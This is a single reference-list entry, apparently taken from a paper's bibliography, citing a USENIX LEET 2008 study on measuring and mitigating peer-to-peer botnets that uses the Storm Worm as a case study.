[25] T. Holz, M. Steiner, F. Dahl, E. Biersack, F. Freiling, Measurements and Mitigation of Peer-to-Peer-based Botnets: A Case Study on StormWorm, http://www.usenix.org/event/leet08/tech/full_papers/holz/holz.pdf

40